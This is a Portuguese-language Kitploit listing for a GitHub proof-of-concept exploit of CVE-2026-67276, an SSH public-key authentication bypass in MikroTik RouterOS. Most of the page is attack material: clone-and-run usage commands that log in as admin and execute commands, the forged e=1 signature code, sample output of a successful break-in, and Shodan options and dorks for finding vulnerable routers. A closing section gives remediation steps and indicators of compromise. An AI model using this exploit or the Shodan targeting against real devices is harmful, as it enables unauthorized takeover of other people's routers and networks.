Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
exploit-mikrotik-2026 — CVE-2026-67276 Exploit de bypass de autenticação SSH do MikroTik RouterOS | Kitploit
Ferramentas/GitHubGitHub/blackhatexploitation/exploit-mikrotik-2026
ReconhecimentoAnálise de VulnerabilidadesExploraçãoColeta de InformaçõesSegurança de RedeTestes de PenetraçãoAutenticação
GitHubblackhatexploitation/exploit-mikrotik-2026

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

exploit-mikrotik-2026

CVE-2026-67276 Exploit de bypass de autenticação SSH do MikroTik RouterOS

Ver Repositório
8278há 20 diasAinda não revisado
Compartilhar

CVE-2026-67276 - Exploit de Bypass de Autenticação SSH MikroTrik

CVE Severity Type Platform

Bypass de Autenticação por Chave Pública SSH no MikroTik RouterOS - Nenhuma Chave Privada Necessária

Uma prova de conceito de exploit para CVE-2026-67276 (MikroTrick), uma vulnerabilidade crítica de bypass de autenticação na implementação SSH do MikroTik RouterOS que permite que atacantes se autentiquem como qualquer usuário sem possuir sua chave privada.


Índice

  • Visão Geral da Vulnerabilidade
  • Como Funciona
  • Versões Afetadas
  • Instalação
  • Uso
  • Reconhecimento com Shodan
  • Detalhes Técnicos
  • Remediação
  • Referências
  • Aviso Legal

Visão Geral da Vulnerabilidade

A Cadeia de Ataque MikroTrick

A CVE-2026-67276 faz parte de uma cadeia de ataque maior denominada "MikroTrick" pelo CERT PL, que foi observada sendo ativamente explorada no mundo real:


Como Funciona

A Vulnerabilidade

A autenticação SSH do RouterOS possui uma falha crítica na forma como valida chaves públicas:

  1. Bug de Correspondência de Chave: O RouterOS compara o blob de chave pública SSH apresentado com as chaves autorizadas usando apenas (tipo de chave, módulo), omitindo completamente o expoente
  2. Expoente do Cliente: A verificação de assinatura usa o expoente do blob fornecido pelo cliente, não da chave armazenada
  3. Falsificação Trivial: Apresentar {ssh-rsa, e=1, n=módulo_da_vítima} torna a verificação trivial

Base Matemática

root@kitploit:~
Verificação RSA Padrão:  sig^65537 mod n == esperado  (requer chave privada)
Verificação Explorada:   sig^1 mod n == sig           (NENHUMA chave privada necessária!)

Com expoente e=1, a verificação de assinatura se torna:

root@kitploit:~
sig^1 mod n == sig

Isso significa que a "assinatura" é simplesmente a própria mensagem codificada EMSA-PKCS1-v1_5 - construtível por qualquer pessoa que conheça o módulo público da vítima.

Pré-requisitos do Ataque

  1. Nome de usuário alvo de uma conta com chave RSA autorizada
  2. O módulo público RSA n dessa chave autorizada (do arquivo .pub, conexões anteriores, etc.)
  3. Acesso de rede à porta SSH

Versões Afetadas

RamoFaixa VulnerávelVersão Corrigida
6.x6.0 - 6.49.206.49.21+

Instalação

root@kitploit:~
# Clonar o repositório
git clone https://github.com/BlackHatExploitation/exploit-mikrotik-2026.git
cd exploit-mikrotik-2026

# Instalar dependências
pip install paramiko cryptography

Uso

Início Rápido

root@kitploit:~
# Exploit básico - gera chave automaticamente, detecta versão
python3 full_exploit.py --host 192.168.88.1 --username admin

# Executar comando após autenticação
python3 full_exploit.py --host 192.168.88.1 --username admin --exec '/system resource print'

# Porta personalizada
python3 full_exploit.py --host 192.168.88.1 --port 2222 --username admin

Usando Chave Pública Existente

root@kitploit:~
# Se você tiver o arquivo de chave pública da vítima
python3 full_exploit.py --host 192.168.88.1 --username admin --pubkey victim.pub

# Ou fornecer o módulo diretamente
python3 full_exploit.py --host 192.168.88.1 --username admin --modulus-hex "00:ab:cd:..."

Detecção de Versão

O exploit detecta automaticamente a versão do RouterOS e verifica o status da vulnerabilidade:

root@kitploit:~
# Forçar exploit mesmo em versão não-MikroTik ou desconhecida
python3 full_exploit.py --host 192.168.88.1 --username admin --skip-version-check

Todas as Opções

root@kitploit:~
--host              IP/hostname do RouterOS alvo (obrigatório)
--port              Porta SSH (padrão: 22)
--username          Nome de usuário do RouterOS alvo (obrigatório)
--pubkey            Arquivo de chave pública RSA (gera automaticamente se não fornecido)
--modulus-hex       Módulo RSA em hex (alternativa ao --pubkey)
--algos             Algoritmos de assinatura (padrão: ssh-rsa,rsa-sha2-256)
--exec              Comando a executar pós-autenticação
--exp-enc           Codificação do expoente: canônica (1 byte) ou alinhada (3 bytes)
--timeout           Timeout de conexão (padrão: 15.0 segundos)
--skip-version-check    Ignorar verificação de versão do RouterOS
--shodan-dorks      Imprimir consultas de busca Shodan
--shodan-search     Buscar alvos na API do Shodan
--shodan-key        Chave da API do Shodan
--shodan-query      Consulta Shodan personalizada
--shodan-limit      Limite de resultados Shodan (padrão: 100)

Reconhecimento com Shodan

Imprimir Dorks

root@kitploit:~
python3 full_exploit.py --shodan-dorks

Buscar na API do Shodan

root@kitploit:~
# Busca básica
python3 full_exploit.py --shodan-search --shodan-key SUA_CHAVE_DA_API

# Consulta personalizada
python3 full_exploit.py --shodan-search --shodan-key SUA_CHAVE --shodan-query 'MikroTik port:22 country:US'

Consultas Shodan Úteis


Detalhes Técnicos

Estrutura do Blob de Chave Pública SSH

root@kitploit:~
string    "ssh-rsa"
mpint     e (expoente público)  <- Atacante fornece e=1
mpint     n (módulo)            <- Módulo real da vítima

Geração de Assinatura Forjada

root@kitploit:~
# A "assinatura" é simplesmente os dados de autenticação codificados em EMSA-PKCS1-v1_5
def forged_signature(data, sig_alg, n):
    k = (n.bit_length() + 7) // 8
    block = emsa_pkcs1_v15(data, sig_alg, k)
    return block  # Esta É a assinatura válida quando e=1

Notas sobre o Formato de Rede

  • A string de tipo interna do blob permanece ssh-rsa mesmo para algoritmos rsa-sha2-256/512
  • O algoritmo de assinatura vai apenas no campo de algoritmo externo
  • Tanto a codificação canônica (1 byte) quanto a alinhada (3 bytes) de e=1 funcionam em versões vulneráveis

Exemplo de Saída

root@kitploit:~
[*] Exploit CVE-2026-67276 MikroTrick
[*] Alvo: 192.168.88.1:22

[*] Detectando versão do RouterOS...
[*] Banner SSH: SSH-2.0-ROSSSH-7.23.3
[*] Versão do RouterOS: 7.23.3
[+] VERSÃO VULNERÁVEL - CVE-2026-67276 se aplica

[*] Gerando par de chaves RSA de 2048 bits...
[+] Chave privada salva: /path/to/exploit_key
[+] Chave pública salva:  /path/to/exploit_key.pub
[*] Módulo: 2048 bits | e=1 forjado
[*] Codificação do expoente: canônica (01)

[*] Tentando rsa-sha2-256 ...
[+] AUTENTICADO como 'admin' via rsa-sha2-256
[+] CVE-2026-67276 CONFIRMADA - alvo está vulnerável
--- saída do comando ---
                uptime: 14d23h45m12s
               version: 7.23.3 (stable)
            build-time: Sep/01/2026 12:00:00

Remediação

1. Atualize Imediatamente

root@kitploit:~
# Verificar versão atual
/system resource print

# Atualizar para versão corrigida
/system package update download
/system reboot

Versões Mínimas Seguras:

  • Ramo 6.x: 6.49.21
  • 7.x estável: 7.23.4
  • 7.x teste: 7.24.2

2. Desative SSH se Não For Necessário

root@kitploit:~
/ip service disable ssh

3. Restrinja o Acesso SSH

root@kitploit:~
# Por endereço IP
/ip service set ssh address=192.168.88.0/24

# Regra de firewall
/ip firewall filter add chain=input dst-port=22 protocol=tcp \
    src-address=!192.168.88.0/24 action=drop

4. Verifique Possível Comprometimento

root@kitploit:~
# Verificar usuários suspeitos
/user print

# Verificar usuário "ops" (indicador conhecido de atacante)
/user print where name=ops

# Verificar status de sinalização do dispositivo
/system/device-mode/print

# Verificar logs
/log print where topics~"ssh"

IOCs Conhecidos:

  • Entradas de log: login failure for user -2 via ssh
  • Usuário privilegiado desconhecido ops
  • Marcador de dispositivo "Flagged"
  • IPs de atacantes: 82.192.72.4, 103.102.31.18

Referências

  • Aviso do CERT PL
  • Detalhes CVE do CERT PL
  • Boletim de Segurança MikroTik
  • RFC 8017 - PKCS#1 v2.2
  • RFC 8332 - Uso de Chaves RSA com SHA-256/512 em SSH
  • RFC 4252 - Protocolo de Autenticação SSH

Aviso Legal

⚠️ Esta ferramenta é fornecida apenas para testes de segurança autorizados e fins educacionais.

  • Use apenas contra sistemas que você possui ou para os quais tenha permissão escrita explícita para testar
  • Acesso não autorizado a sistemas de computador é ilegal sob a CFAA, Computer Misuse Act e leis similares em todo o mundo
  • Os autores não são responsáveis por qualquer uso indevido ou dano causado por esta ferramenta
  • Ao usar esta ferramenta, você concorda em usá-la de forma responsável e legal

Licença

Licença MIT - Consulte LICENSE para detalhes.


Autor

PoC de Pesquisa em Segurança - Implementação de Laboratório CVE-2026-67276

Dê uma estrela neste repositório se você o achar útil!

Baixar ferramenta
DetalheInformação
ID CVECVE-2026-67276
SeveridadeCrítica (CVSS 9.8)
CWECWE-347 (Verificação Incorreta de Assinatura Criptográfica)
Vetor de AtaqueRede
AutenticaçãoNenhuma
ComplexidadeBaixa
ImpactoComprometimento total do dispositivo
CVETipoDescrição
CVE-2026-67276Bypass de AutenticaçãoBypass de autenticação por chave pública SSH via falsificação de expoente
CVE-2026-86060Escalação de PrivilégioInjeção de argumento via nome de usuário
CVE-2026-67279Bypass de AutenticaçãoConexão SSH sem userauth concluído
CVE-2026-67277Divulgação de InformaçãoVazamento de memória do kernel via bandwidth-test
CVE-2026-67278Bypass de AssinaturaAceitação de assinatura X.509 malformada
CVE-2026-67281Leitura de ArquivoLeitura de arquivo raiz no WebFig via jsproxy
7.x estável
7.0 - 7.23.3
7.23.4+
7.x teste7.24.0 - 7.24.17.24.2+
AlvoConsulta
Todos os MikroTikMikroTik
MikroTik SSHMikroTik port:22
Winbox Expostoport:8291
Painel WebFighttp.title:RouterOS
RouterOS 6.49.xMikroTik "6.49"
RouterOS 7.xMikroTik "RouterOS v7"
Por PaísMikroTik country:US
Indício de VulnerabilidadeMikroTik ("6.49" OR "7.23" OR "7.24.0")